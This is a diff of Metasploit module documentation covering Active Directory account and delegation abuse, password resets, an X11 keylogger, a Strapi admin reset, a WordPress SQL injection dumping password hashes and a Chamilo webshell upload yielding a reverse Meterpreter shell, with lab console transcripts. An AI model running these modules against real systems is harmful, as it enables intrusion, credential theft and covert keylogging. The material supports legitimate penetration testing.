+- The `NEW_PASSWORD` option must always be provided
+
+**USERNAME**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**PASSWORD**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set.
@@ -62,14 +62,14 @@ PropagationFlags      : None

 ## Module usage

-The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+The `admin/dcerpc/samr_account` module is generally used to first create a computer account, which by default, all user accounts in a domain can perform:

 1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
 3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
-   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
-   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
 4. Run the module and see that a new machine account was added

 Then the `auxiliary/admin/ldap/rbcd` can be used:
@@ -121,19 +121,30 @@ with the Service for User (S4U) Kerberos extension.
 First create the computer account:

 ```msf
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
+msf6 auxiliary(admin/dcerpc/samr_account) > show options

-Module options (auxiliary/admin/dcerpc/samr_computer):
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT_NAME                       no        The account name
+   ACCOUNT_PASSWORD                   no        The password for the new account

-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass                             no        The password for the specified username
-   SMBUser                             no        The username to authenticate as
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as


 Auxiliary action:
@@ -143,13 +154,13 @@ Auxiliary action:
   ADD_COMPUTER  Add a computer account


-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser sandy
 SMBUser => sandy
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
+msf6 auxiliary(admin/dcerpc/samr_account) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
@@ -157,7 +168,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
+msf6 auxiliary(admin/dcerpc/samr_account) > use auxiliary/admin/ldap/rbcd
 ```

 Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
@@ -181,7 +192,7 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 ```

-Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_account`:

 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
@@ -0,0 +1,46 @@
+## Introduction
+
+Allows changing or resetting users' passwords.
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges).
+
+This module works with existing sessions (or relaying), especially for Reset use cases, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated.
+- `RESET_NTLM` - Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+- `CHANGE` - Change the password, knowing the existing one. New AES kerberos keys will be generated.
+- `CHANGE_NTLM` - Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `SMBUser` and `SMBPass`, even if using an existing session (since the API requires both of these to be specified, even for open SMB sessions)
+- When resetting or changing a password, you must specify `NEW_PASSWORD`
+- When resetting or changing an NTLM hash, you must specify `NEW_NTLM`
+
+**SMBUser**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**SMBPass**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set for `RESET` and `CHANGE` actions. 
+
+**NEW_NTLM**
+
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -0,0 +1,205 @@
+## Vulnerable Application
+Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all, compute, storage and application resources.
+Businesses and Service Providers are using it to protect and backup all IT assets in their IT environment.
+
+This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect appliance which,
+in its default configuration, allows the anonymous registration of new backup/protection agents on new endpoints.
+This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance.
+As the management web console is running on the same port as the API for the agents,
+this bearer token is also valid for any actions on the web console.
+This allows an attacker with network access to the appliance to start the registration of a new agent,
+retrieve a bearer token that provides admin access to the available functions in the web console.
+
+This module will gather all machine info (endpoints) configured and managed by the appliance.
+This information can be used in a subsequent attack that exploits this vulnerability to execute arbitrary commands
+on both the managed endpoint and the appliance itself.
+This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+The following releases were tested.
+
+**Acronis Cyber Protect 15  ISO appliances:**
+* Acronis Cyber Protect 15 Build 28503
+* Acronis Cyber Protect 15 Build 27009
+* Acronis Cyber Protect 15 Build 26981
+* Acronis Cyber Protect 15 Build 26172
+
+**Acronis Cyber Protect 12.5  ISO appliances:**
+* Acronis Cyber Protect 12.5 Build 16428
+* Acronis Cyber Protect 12.5 Build 16386
+* Acronis Cyber Protect 12.5 Build 14330
+* Acronis Cyber Protect 12.5 Build 11010
+
+## Installation steps to install the Acronis Cyber Protect/Backup appliance
+* Install the virtualization engine VMware Fusion on your preferred platform.
+* [Install VMware Fusion on MacOS](https://knowledge.broadcom.com/external/article/315638/download-and-install-vmware-fusion.html).
+* [Download ISO Image](https://care.acronis.com/s/article/71847-Acronis-Cyber-Protect-Links-to-download-installation-files?language=en_US).
+* Install the Acronis iso image in your virtualization engine by unzipping the appliance image and import the `ovf` image.
+* During the boot, select `Install appliance` and  configure the installation settings such as setting the root password and IP address
+* using the option `change installation settings`.
+* Boot up the VM and should be able to access the Acronis Cyber Protect/Backup appliance either thru the console, `ssh` on port `22`
+* via the `webui` via `http://your_ip:9877`.
+* Ensure that you have registered yourself on the Acronis Web site and applied for the 30-days trial for Acronis Cyber Protect.
+* Login into the appliance via the `webui`.
+* Follow the license instructions to apply your 30-day trial license.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`
+- [ ] `set rhosts <ip-target>`
+- [ ] `run`
+- [ ] you should get a list of all endpoints that are registered at the appliance.
+
+## Options
+### OUTPUT
+You can use option `table` to print output of the gather info to the console (default).
+Choosing option `json` will store all information at a file in `json` format at the loot directory.
+You can use this file in combination with `jq` for offline queries and processing.
+
+## Scenarios
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > info
+
+       Name: Acronis Cyber Protect/Backup machine info disclosure
+     Module: auxiliary/gather/acronis_cyber_protect_machine_info_disclosure
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Sandro Tolksdorf of usd AG.
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  OUTPUT     table            yes       Output format to use (Accepted: table, json)
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                        metasploit.html
+  RPORT      9877             yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI of the vulnerable Acronis Cyber Protect/Backup instance
+  VHOST                       no        HTTP server virtual host
+
+Description:
+  Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,
+  compute, storage and application resources. Businesses and Service Providers are using it
+  to protect and backup all IT assets in their IT environment.
+  This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect
+  appliance which, in its default configuration, allows the anonymous registration of new
+  backup/protection agents on new endpoints. This API endpoint also generates bearer tokens
+  which the agent then uses to authenticate to the appliance.
+  As the management web console is running on the same port as the API for the agents, this
+  bearer token is also valid for any actions on the web console. This allows an attacker
+  with network access to the appliance to start the registration of a new agent, retrieve
+  a bearer token that provides admin access to the available functions in the web console.
+
+  This module will gather all machine info (endpoints) configured and managed by the appliance.
+  This information can be used in a subsequent attack that exploits this vulnerability to
+  execute arbitrary commands on both the managed endpoint and the appliance which is covered
+  in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+  Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+  Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2022-30995
+  https://nvd.nist.gov/vuln/detail/CVE-2022-3405
+  https://herolab.usd.de/security-advisories/usd-2022-0008/
+  https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995
+
+View the full module info with the info -d command.
+```
+### Acronis Cyber Backup 12.5 build 14330 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+
+[*] Running module against 192.168.201.6
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 12.5.14330
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: 28BAFD9F-F9F1-481F-A970-1A6ED70736AC
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.0CA16CD4-1C6D-44D2-BEF1-B9F146005EE1@28BAFD9F-F9F1-481F-A970-1A6ED70736AC.disks
+[*] type: machine
+[*] hostname: WIN-BJDNH44EEDB
+[*] IP: 192.168.201.5
+[*] OS: Microsoft Windows Server 2019 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] ----------------------------------------
+[+] hostId: 345C3F1E-92C3-4E92-8EF8-AC6BF136BB83
+[+] parentId: phm-group.7C2057CC-8D32-40CA-9B83-4A8E73078F7F.disks
+[+] key: phm.F70D1B08-5097-4CE5-8E22-F9E0DB75401F@345C3F1E-92C3-4E92-8EF8-AC6BF136BB83.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-AC319
+[*] IP: 192.168.201.6
+[*] OS: GNU/Linux
+[*] ARCH: linux
+[*] ONLINE: true
+[*] Auxiliary module execution completed
+```
+### Acronis Cyber Backup 15 build 27009 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+[*] Running module against 192.168.201.6
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 15.0.27009
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: D287E868-EDBB-4FE9-85A9-F928AA10EE5D
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.EA9A6E26-38B5-4727-9957-FD7CDD7BF2CC@D287E868-EDBB-4FE9-85A9-F928AA10EE5D.disks
+[*] type: machine
+[*] hostname: AcronisAppliance-FCD94
+[*] IP: 192.168.201.6
+[*] OS: Linux: CentOS Linux release 7.6.1810 (Core)
+[*] ARCH: linux
+[*] ONLINE: true
+[*] ----------------------------------------
+[+] hostId: C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E
+[+] parentId: 00000000-0000-0000-0000-000000000000
+[+] key: phm.1100195A-112E-4904-A933-264C2D12A4A5@C0FBDC6F-A5FE-4710-ADE8-99B3F8A7CE1E.disks
+[*] type: machine
+[*] hostname: victim.evil.corp
+[*] IP: 192.168.201.2
+[*] OS: Microsoft Windows Server 2022 Standard
+[*] ARCH: windows
+[*] ONLINE: false
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+No limitations.
@@ -27,7 +27,7 @@ Solino.
 ### Setup
 A privileged user is required to run this module, typically a local or domain
 Administrator. It has been tested against multiple Windows versions, from
-Windows XP/Server 2003 to Windows 10/Server version 2004.
+Windows XP/Server 2003 to Windows 10/Server version 2022.

 ## Verification Steps
 1. Start msfconsole
@@ -53,6 +53,18 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 Use inline technique to read protected keys from the registry remotely without
 saving the hives to disk (default: true).

+### KRB_USERS
+Restrict retrieving domain information to the users or groups specified. This
+is a comma-separated list of Active Directory groups and users. This parameter
+is only utilised for domain replication (`action` set to `DOMAIN` or `ALL`).
+`set KRB_USERS "user1,user2,Domain Admins"
+
+### KRB_TYPES
+Restrict retrieving domain information to a specific type of account; either
+`USERS_ONLY` or `COMPUTERS_ONLY`, or `ALL` to retrieve all accounts. This
+parameter is only utilised for domain replication (`action` set to `DOMAIN` or
+`ALL`). It is ignored if `KRB_USERS` is also set.
+
 ## Actions

 ### ALL
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+This module binds to an open X11 host to log keystrokes. The X11 service can accept
+connections from any users when misconfigured with the command `xhost +`.
+This module is a close copy of the old xspy c program which has been on Kali for a long time.
+The module works by connecting to the X11 session, creating a background
+window, binding a keyboard to it and creating a notification alert when a key
+is pressed.
+
+One of the major limitations of xspy, and thus this module, is that it polls
+at a very fast rate, faster than a key being pressed is released (especially before
+the repeat delay is hit). To combat printing multiple characters for a single key
+press, repeat characters arent printed when typed in a very fast manor. This is also
+an imperfect keylogger in that keystrokes arent stored and forwarded but status
+displayed at poll time. Keys may be repeated or missing.
+
+### Ubuntu 10.04
+
+1. `sudo nano /etc/gdm/gdm.schemas`
+2. Find:
+
+    ```
+    <schema>
+     <key>security/DisallowTCP</key>
+     <signature>b</signature>
+     <default>true</default>
+    </schema>
+    ```
+  - Change `true` to `false`
+
+3. logout or reboot
+4. Verification: ```sudo netstat -antp | grep 6000```
+
+    ```
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
+
+5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Ubuntu 12.04, 14.04
+
+1. `sudo nano /etc/lightdm/lightdm.conf`
+2. Under the `[SeatDefaults]` area, add:
+
+    ```
+    xserver-allow-tcp=true
+    allow-guest=true
+    ```
+
+3. logout or reboot
+4. Verification: ```sudo netstat -antp | grep 6000```
+
+    ```        	
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
+
+5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Ubuntu 16.04
+
+  Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
+
+### Fedora 15
+
+1. `vi /etc/gdm/custom.conf`
+2. Under the `[security]` area, add:
+
+    ```
+    DisallowTCP=false
+    ```
+
+3. logout/reboot
+4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Solaris 10
+
+1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
+2. `svc disable cde-login`
+3. `svc enable cde-login`
+4. `xhost +`
+
+### Ubuntu 22.04
+
+#### Server
+
+Getting X11 to listen on a TCP port is rather taxing, so we use socat to facilitate instead.
+
+1. `sudo apt-get install ubuntu-desktop socat` # overkill but it gets everything we need
+2. `sudo reboot` # prob a good idea since so much was installed
+3. `sudo xhost +` # must be done through gui, not through SSH
+4. `socat -d -d TCP-LISTEN:6000,fork,bind=<IP to listen to here> UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to use `X1` instead of `X0` depending on context.
+
+## Verification Steps
+
+1. Configure X11 to listen on port 6000, or use `socat` to open a socket.
+1. Start msfconsole
+1. Do: `use auxiliary/gather/x11_keyboard_spy`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should print keystrokes as they're pressed
+
+## Options
+
+### LISTENER_TIMEOUT
+
+How many seconds to keylog for.
+If set to `0`, wait forever. Defaults to `600`, 10 minutes.
+
+### PRINTERVAL
+
+The interval to print keylogs in seconds. Defaults to `60`.
+
+## Scenarios
+
+### Ubuntu 22.04
+
+```
+[*] Processing xspy.rb for ERB directives.
+resource (xspy.rb)> use auxiliary/gather/x11_keyboard_spy
+resource (xspy.rb)> set verbose true
+verbose => true
+resource (xspy.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/x11_keyboard_spy) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:6000 - Establishing TCP Connection
+[*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
+[-] 127.0.0.1:6000 - Connection packet malformed (size: 8192), attempting to get read more data
+[+] 127.0.0.1:6000 - Successfully established X11 connection
+[*] 127.0.0.1:6000 - Version: 11.0
+[*] 127.0.0.1:6000 - Screen Resolution: 958x832
+[*] 127.0.0.1:6000 - Resource ID: 33554432
+[*] 127.0.0.1:6000 - Screen root: 1320
+[*] 127.0.0.1:6000 - [2/9] Checking on BIG-REQUESTS extension
+[+] 127.0.0.1:6000 -   Extension BIG-REQUESTS is present with id 134
+[*] 127.0.0.1:6000 - [3/9] Enabling BIG-REQUESTS
+[*] 127.0.0.1:6000 - [4/9] Creating new graphical context
+[*] 127.0.0.1:6000 - [5/9] Checking on XKEYBOARD extension
+[+] 127.0.0.1:6000 -   Extension XKEYBOARD is present with id 136
+[*] 127.0.0.1:6000 - [6/9] Enabling XKEYBOARD
+[*] 127.0.0.1:6000 - [7/9] Requesting XKEYBOARD map
+[*] 127.0.0.1:6000 - [8/9] Enabling notification on keyboard and map
+[*] 127.0.0.1:6000 - [9/9] Creating local keyboard map
+[+] 127.0.0.1:6000 - All setup, watching for keystrokes
+[+] 127.0.0.1:6000 - X11 Key presses observed: te[space]quuick[space]rown[space]foxmps[space]oveerr[space]the[space]lazy[space]do
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[*] 127.0.0.1:6000 - Closing X11 connection
+[+] 127.0.0.1:6000 - Logged keys stored to: /root/.msf4/loot/20240226150211_default_127.0.0.1_x11.keylogger_839830.txt
+[-] 127.0.0.1:6000 - Stopping running against current target...
+[*] 127.0.0.1:6000 - Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
+
+## Confirming
+
+To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
+
+The output will be very similar to the metasploit module, but may differ. Compare the below two entries (spaces added to xspy for alignment):
+
+```
+xspy: the      quck         rown       foxumps      over         the       lazy      do
+msf:  te[space]quuick[space]rown[space]foxmps[space]oveerr[space]the[space]lazy[space]do
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module abuses the mishandling of a password reset request for 
+Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+
+### Install
+
+
+```
+docker run -it -p 1337:1337 --rm node:16 /bin/bash
+export CXXFLAGS="-std=c++17"
+# Complete the quickstart
+npm install -g create-strapi-app@3.0.0-beta.17.4 && create-strapi-app yourProjectName
+```
+
+Navigate to http://localhost:1337/ to verify the application is running. Now create the first admin account at http://localhost:1337/admin
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/strapi_3_password_reset`
+1. Do: `set new_password testtesttest`
+1. Do: `set rport 1337`
+1. Do: `set rhosts 127.0.0.1`
+1. Do: `run`
+1. You should be able to reset the admin users password
+
+## Options
+
+### NEW_PASSWORD
+
+New Admin password. No default.
+
+## Scenarios
+
+### npx install of strapi 3.0.0-beta.17.4
+
+```
+msf6 > use auxiliary/scanner/http/strapi_3_password_reset
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set new_password testtesttest
+new_password => testtesttest
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rport 1337
+rport => 1337
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > check
+[-] This module does not support check.
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > run
+
+[*] Resetting admin password...
+[+] Password changed successfully!
+[+] User: superadminuser
+[+] Email: none@none.com
+[+] PASSWORD: testtesttest
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+Perfect Survey, a WordPress plugin, version 1.5.1 is affected by an unauthenticated SQL injection vulnerability
+via the `question_id` parameter.
+
+An unauthenticated attacker can exploit this SQL injection vulnerability to retrieve sensitive information,
+such as usernames and password hashes, from the `wp_users` table.
+
+The vulnerable plugin can be downloaded from the [WordPress plugin repository](https://wordpress.org/plugins/).
+The specific vulnerable version can be found here: https://www.exploit-db.com/apps/51c80e6262c3a39fa852ebf96ff86b78-perfect-survey.1.5.1.zip
+
+## Verification Steps
+
+1. Install the WordPress application and the vulnerable version of the Perfect Survey plugin.
+2. Start `msfconsole`.
+3. Run: `use auxiliary/scanner/http/wp_perfect_survey_sqli`.
+4. Set the target host: `set RHOSTS [ip]`.
+5. Adjust other options as necessary, such as `TARGETURI` (default is `/`).
+6. Execute the module: `run`.
+7. The module should retrieve usernames and password hashes from the WordPress installation.
+
+## Options
+
+## Scenarios
+
+### WordPress with Perfect Survey Plugin 1.5.1 on Ubuntu 20.04
+
+#### Example
+
+```sh
+msf6 > use auxiliary/scanner/http/wp_perfect_survey_sqli
+[*] Using auxiliary/scanner/http/wp_perfect_survey_sqli
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RHOSTS 192.168.1.104
+RHOSTS => 192.168.1.104
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RPORT 8000
+RPORT => 8000
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set TARGETURI /wordpress
+TARGETURI => /wordpress
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > exploit 
+[*] Running module against 192.168.1.104
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Exploiting SQLi in Perfect Survey plugin...
+[*] Extracting credential information
+
+WordPress User Credentials
+==========================
+
+ Username  Email                Hash
+ --------  -----                ----
+ admin     admin@localhost.com  $P$BwkQxR6HIt64UjYRG4D5GRKYdk.qcR1
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) >
+```
@@ -138,7 +138,7 @@ Local File System Commands
 This session also works with the following modules:

  auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
  auxiliary/admin/smb/delete_file
  auxiliary/admin/smb/download_file
  auxiliary/admin/smb/psexec_ntdsgrab
@@ -10,7 +10,7 @@ on a given template.
    * See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-esc8-vulnerable-host
 2. Start `msfconsole`
 2. Do: `use auxiliary/server/relay/esc8`
-3. Set the `RANDOMIZE_TARGETS` option to the AD CS Web Enrollment server
+3. Set the `RELAY_TARGETS` option to the AD CS Web Enrollment server
 4. Run the module and wait for a request to be relayed

 ## Options
@@ -0,0 +1,89 @@
+## Vulnerable Application
+Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24
+a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter `action` is set to
+`post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded to:
+`/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist
+by default.
+
+### Setup
+
+A vulnerable docker-compose configuration can be found at the following link: https://github.com/vulhub/vulhub/pull/559
+1. Clone the repo `git clone https://github.com/vulhub/vulhub.git`
+1. Checkout the pull request mentioned above: `git checkout CVE-2023-4220`
+1. Run `cd vulhub/chamilo/CVE-2023-4220`
+1. Start the environment: `docker compose up`
+1. Navigate to `http://127.0.0.1:8080` to complete the installation wizard.
+1. Note when filling out the database IP address and credentials - the DB hostname is the name of the container which is
+   `mariadb` (not `localhost` or `127.0.0.1`).
+1. Once the installation wizard is complete the target should be ready to be
+   exploited with the module. This container has the non-default `/files/` directory created already.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use linux/http/chamilo_bigupload_webshell`
+1. Set the `RHOST`, `RPORT`, and `LHSOT` options
+1. Run the module
+1. Receive a Meterpreter session as the `www-data` user.
+
+## Scenarios
+### Chamilo 1.11.18 running in Docker
+```
+msf6 > use linux/http/chamilo_bigupload_webshell
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > show options
+
+Module options (exploit/linux/http/chamilo_bigupload_webshell):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    8080             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
